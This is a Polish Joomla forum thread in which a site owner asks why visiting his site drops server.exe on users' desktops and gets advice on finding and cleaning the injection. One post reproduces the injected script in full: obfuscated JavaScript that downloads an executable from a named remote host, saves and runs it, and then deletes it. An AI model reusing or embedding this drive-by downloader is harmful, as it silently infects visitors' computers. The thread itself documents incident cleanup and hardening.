dziwna infekcja
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 18

Temat: dziwna infekcja

  1. #1
    Debiutant
    Dołączył
    17-03-2008
    Wpisy
    4
    Punkty
    10

    Domyślny dziwna infekcja

    Witam,
    jestem jeszcze niedoswiadczonym joomlistom ;) i byc moze moj problem wyda sie uzytkownikom tego forum banalny.
    Ja niestety mam problem i nieumiem sobie z tym poradzic. Na forum znalazlem jedynie opisy jak zabezpieczyc sie, nigdzie natomiast nieznalazlem opisu rozwiazania. Otoz mam strone w joomli 1.0.13 pl utf8 (jeszcze czesciowo w trakcie tworzenia) i do tej pory (do czwartku) strona dzialala bez zarzutu.

    Natomiast od 2 dni wchodzac na adres mojej strony wyswietla sie ona i bez ostrzezen automatycznie kopiuje (instaluje?) sie plik na pulpicie o nazwie server.exe . Co prawda sprawdzalem tylko pod IE6 ale na 4 roznych kompach i za kazdym razem wpisujac adres mojej strony potem okazuje sie ze na pulpicie jest plik server.exe.

    Zrobilem pare bledow (teraz to wiem po analizie forum), ze nie zabezpieczylem plikow chmod na 444 i praktycznie nie interesowalem sie bezpieczenstwem.

    Ale teraz moim problemem i pytaniem do forumowiczow jest, gdzie mam szukac bledu, gdzie moze byc fałszywy (zlosliwy) wpis, jakiego rodzaju moze byc to wpis i gdzie go szukac. Prosze o pomoc, jest to moja pierwsza strona i dopiero sie ucze joomli.
    pozdrawiam i prosze o pomoc
    Ostanio edytowane przez michalp : 20-04-2008 23:25

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wiarus
    Dołączył
    20-11-2007
    Wpisy
    2 924
    Punkty
    51

    Domyślny

    Co do kwestii bezpieczenstwa to zapoznaj sie z tym dzialem forum. A co do problemu. Musisz recznie sprawdzic czy w plikach
    templates\twoj szablon\index.php nie ma jakiegos "dodatkowego kodu" odpowiedzialnego za ten plik. Sprawdz tez inne pliki index i default zarowno html i php jakie sa w glownych podkatalogach czyli
    administrator/
    components/
    i pozostalych.
    Zawsze szukaj fragmentu kodu z tym exe-kiem lub ramek <iframe o wielkosci 1.px.

  4. #3
    Debiutant
    Dołączył
    17-03-2008
    Wpisy
    4
    Punkty
    10

    Domyślny problem rozwiązany

    Dziękuję za pomoc, dowiedziałem co i gdzie szukać.
    Po krótkim śledztwie znalazłem fałszywy wpis w pliku index.php w katalogu głównym. Po jego wykasowaniu działanie mojej joomli już nie budzi zastrzeżeń
    Wpis był tresci:
    "<script>
    var dc=document.write;
    var sc=String.fromCharCode;
    var exe="http://www.mb21.co.kr/img/Server.exe";
    var file="Server.exe";
    dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,9 7,105,108,105,97,110,44,122,104,97,110,44,99,109,1 00,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,115,61,34,99,109,100,46,10 1,120,101,34,59,116,114,121,123,118,97,114,32,97,1 00,111,61,40,100,111,99,117,109,101,110,116,46,99, 114,101,97,116,101,69,108,101,109,101,110,116,40,3 4,111,98,106,101,99,116,34,41,41,59,118,97,114,32, 100,61,49,59,97,100,111,46,115,101,116,65,116,116, 114,105,98,117,116,101,40,34,99,108,97,115,115,105 ,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67 ,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,5 1,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41, 59,118,97,114,32,101,61,49,59,118,97,114,32,120,10 9,108,61,97,100,111,46,67,114,101,97,116,101,79,98 ,106,101,99,116,40,34,77,105,99,114,111,115,111,10 2,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,11 8,97,114,32,102,61,49,59,118,97,114,32,108,110,61, 34,65,100,111,34,59,118,97,114,32,108,122,110,61,3 4,100,98,46,83,116,34,59,118,97,114,32,97,110,61,3 4,114,101,97,109,34,59,118,97,114,32,103,61,49,59, 118,97,114,32,97,115,61,97,100,111,46,99,114,101,9 7,116,101,111,98,106,101,99,116,40,108,110,43,108, 122,110,43,97,110,44,34,34,41,59,118,97,114,32,104 ,61,49,59,120,109,108,46,79,112,101,110,40,34,71,6 9,84,34,44,97,105,108,105,97,110,44,48,41,59,120,1 09,108,46,83,101,110,100,40,41,59,97,115,46,116,12 1,112,101,61,49,59,118,97,114,32,110,61,49,59,97,1 15,46,111,112,101,110,40,41,59,97,115,46,119,114,1 05,116,101,40,120,109,108,46,114,101,115,112,111,1 10,115,101,66,111,100,121,41,59,97,115,46,115,97,1 18,101,116,111,102,105,108,101,40,122,104,97,110,4 4,50,41,59,97,115,46,99,108,111,115,101,40,41,59,1 18,97,114,32,115,104,101,108,108,61,97,100,111,46, 99,114,101,97,116,101,111,98,106,101,99,116,40,34, 83,104,101,108,108,46,65,112,112,108,105,99,97,116 ,105,111,110,34,44,34,34,41,59,115,104,101,108,108 ,46,83,104,101,108,108,69,120,101,99,117,116,101,4 0,122,104,97,110,44,34,34,44,34,34,44,34,111,112,1 01,110,34,44,48,41,59,115,104,101,108,108,46,83,10 4,101,108,108,69,120,101,99,117,116,101,40,99,109, 100,115,115,44,34,32,47,99,32,100,101,108,32,47,83 ,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,3 4,44,34,111,112,101,110,34,44,48,41,59,125,99,97,1 16,99,104,40,101,41,123,125,59,60,47,115,99,114,10 5,112,116,62));
    </script>"

    Mam pytanie, co oznaczają - jaką funkcję mogą spełniać w skrypcie wpisane liczby w dc(sc..

  5. #4
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    26 830
    Punkty
    1096

    Domyślny

    Działanie Twojego Joomla zostało tyko na chwilę przywrócone, niestety. Strona jest shakowana. Podaj więcej info (wersja Joomla, zainstalowane komponenty)

  6. #5
    Debiutant
    Dołączył
    17-03-2008
    Wpisy
    4
    Punkty
    10

    Domyślny parametry joomli

    Moja strona jest shakowana?
    Myslalem, ze usuniecie znalezionego skryptu zalatwi sprawe, ale to by było zbyt proste i łatwe..
    Skopiowałem całą zawartośc ftp na dysk, następnie poleceniem zjadz z tego folderu wyszukalem wszytskie pliki index.* i zobaczylem, ktore byly ostatnio modyfikowane (data, godzina), i w ten sposob znalazlem plik z dopisanym skryptem. Po usunieciu skryptu strona zaczela dzialac prawidlowo.
    Tylko skoro jest shakowana, to co mam teraz wykonac?
    Adres mojej strony to www.sterowniki-online.pl , podpięte do tej domeny sa takze www.sterownikionline.pl i www.sterowniki-przemyslowe.pl

    Parametry mojej Joomla:
    - joomla 1.0.13 JIE-utf8
    - docman 1.4pl
    - artbanner plus (info:Komponent został oparty na ArtBanners Component 2.0 Alpha napisanym przez Jonatas Eridani.Wersja 0.4 Create by Dino Porcaro)
    - letterman
    - wraper
    - virtuemart (zainstalowany komponent, moduł, boty - ale nie skonfigurowany)
    - fireboard (forum było skonfigurowane, ale odpięlem od guzika menu - obecnie brak linku na www do forum)

    Co mam (powinienem zrobić) skoro strona shakowana? Odinstalowac wszystkie komponenty, moduły, boty i swieze zainstalowac? Na nowo postawic joomle (mam nadzieje ze to ostatecznosc)? czy jeszcze cos innego Jak sprawdzic czy rzeczywiscie shakowana? Co teraz powinienem zrobic - zalezy mi aby strona dzialala i byla "zdrowa"

    prosze o pomoc
    Ostanio edytowane przez michalp : 21-04-2008 02:11

  7. #6
    Wiarus dkint awatar
    Dołączył
    12-02-2006
    Skąd
    Zamość
    Wpisy
    1 123
    Punkty
    51

    Domyślny

    Witam

    Może zacznij od zablokowania tego adresu w htaccess, a później zaktualizuj wszystkie dokładane komponenty i moduły do najnowszych wersji ...

    pozdrawiam
    Krzysiek
    Wirtualne Roztocze ... - zapraszam wszystkich miłośników Roztocza.

  8. #7
    Debiutant
    Dołączył
    17-03-2008
    Wpisy
    4
    Punkty
    10

    Domyślny zabezpieczenie sie

    Tak jak pisalem powyżej, po usunieciu zlosliwego skryptu moja Jomla zaczęła prawidłowo działać i działa nadal.
    Co do działań prewencyjnych:
    - wpisalem zlosliwy adres url do pliku htaccess
    - zablokowalem na serwerze hostingowym adres IP z którego nastąpiło włamanie (sprawdzilem logi)
    - w joomli zmienilem Register Globals na OFF (było na ON)
    - usunąłem (ale z ftp, nie z poziomu administratora, niepotrzebne komponenty, moduły itd),
    - pozmienialem hasła do joomla i do ftp
    Czy wobec powyższych czynnosci nadal jest podejrzenie ze moja strona moze szybko przestac dzialac i jest shakowana? Co jeszczed powinienem zrobic (poza aktualizacją do najnowszych wersji komponentow, modułów i botów)?

    Przy okazji - usuwając z poziomu FTP czesc komponentow, chyba czegos za duzo usunałem (i błąd, ze nie z poziomu joomla nie usuwalem) np. teraz mam na stonie pobieralnie wykonaną w docmanie, ale z poziomu zaplecza joomli niewidac docmana w komponentach (w instalatorze jedynie jest puste miejsce tak jakby brakowalo tekstu), tak wiec niewidząc docmana w komponentach niemoge zarządzać plikami. Probowalem doinstalowac docmana - ale mi wywala komunikat ze musze najpierw odinstalowac starego docmana (a nnie widac go w spisie komponentow) - no ale ten konkretnie problem pewnie nalezy do innej kategorii joomla-forum.

  9. #8
    kurtz
    Gość

    Domyślny

    no, jechać na włączonych register_globals i się dziwić ...
    Ostanio edytowane przez kurtz : 22-04-2008 16:04

  10. #9
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    26 830
    Punkty
    1096

    Domyślny

    Przede wszystkim zaktualizować do 1.0.15. Podobny "efekt" naprawiałem na jednej ze stron ostatnio ze 4 razy. Niestety, nie dało się zmienić niektórych wrażliwych ustawień serwera (register globals na ON i wyłączona możliwość zmiany lokalnie!, hehehe). Aktualizacja do 1.0.15 rozwiązała problem (może tylko na jakiś czas, ale haker dostawał się przez którąś z luk w 1.0.13, czego też sprawdzić nie można było, bo "admin" nie miał czas zajmować się problemem!)

  11. #10
    Wiarus stasio awatar
    Dołączył
    09-01-2007
    Skąd
    Na zesłaniu na Wyspie Świętej Heleny
    Wpisy
    1 100
    Punkty
    37

    Domyślny

    Cytat Wysłane przez zwiastun Zobacz wiadomość
    Przede wszystkim zaktualizować do 1.0.15.
    tym bardziej ze doszły mnie słuchy ze w 15 jest juz administracja w polskiej wersji... prawdaż to czy tylko żart ponury?

Strona 1 z 2 12 OstatniOstatni

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •